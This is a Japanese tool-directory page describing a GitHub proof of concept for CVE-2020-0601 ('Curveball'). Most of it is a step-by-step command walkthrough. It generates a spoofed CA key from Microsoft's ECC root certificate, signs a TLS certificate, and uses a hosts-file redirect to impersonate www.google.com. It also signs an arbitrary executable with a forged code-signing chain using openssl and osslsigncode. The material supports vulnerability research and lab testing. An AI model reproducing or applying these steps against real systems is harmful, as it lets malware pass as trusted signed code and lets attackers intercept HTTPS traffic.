Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-0601_PoC — CVE-2020-0601(通称 curveball)のデモ。https://github.com/kudelskisecurity/chainoffools と https://github.com/ly4k/CurveBall で入手可能なPoCに基づいています。 | Kitploit
ツール/GitHubGitHub/joelbts/cve-2020-0601_poc
脆弱性分析コード分析エクスプロイトウェブセキュリティ暗号化ペネトレーションテスト
GitHubjoelbts/cve-2020-0601_poc

CVE-2020-0601_PoC

CVE-2020-0601(通称 curveball)のデモ。https://github.com/kudelskisecurity/chainoffools と https://github.com/ly4k/CurveBall で入手可能なPoCに基づいています。

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

POC に基づく https://github.com/ly4k/CurveBall

https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/

https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file


要件/使用ソフトウェア


python バージョン 3.11 openssl バージョン 3.1 osslsigncode バージョン 2.5 python ライブラリ(gen-key.py と httpServer.py 内)


TLS 証明書の署名


信頼されたルート証明書から偽装 CA キーを作成します(secp384r1 かつ PEM 形式である必要があります)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

偽装キーを使用して偽装 CA を作成します

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

偽装 CA によって署名される別の SSL 証明書(任意の種類)を作成します

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

証明書のための証明書署名要求(CSR)を作成します

openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

偽装 CA 証明書を使用して CSR に署名します

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

偽装証明書チェーンを使用して HTTPS サーバーを起動します

python httpServer.py

Windows マシン上での操作

hosts ファイルに <kali.machine.ip> www.google.com を追加します(google をサーバーにリダイレクト)

HTTPS://www.google.com にアクセスします

証明書が信頼され、'Hello World' が表示されるはずです

エラーが発生した場合は、システム時刻が正しいか確認してください


コード署名


信頼されたルート証明書から偽装 CA キーを作成します(secp384r1 かつ PEM 形式である必要があります)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

偽装キーを使用して偽装 CA を作成します

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

コード署名に使用できる新しいキーを作成します

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

署名可能な証明書署名要求をキーを使用して作成します

openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

偽装 CA を使用して CSR に署名します

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

キー、証明書、偽装 CA を PKCS12 ファイルにまとめて、exe に署名できるようにします

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

PKCS12 ファイルを使用して実行可能ファイルに署名します

osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe

ツールをダウンロード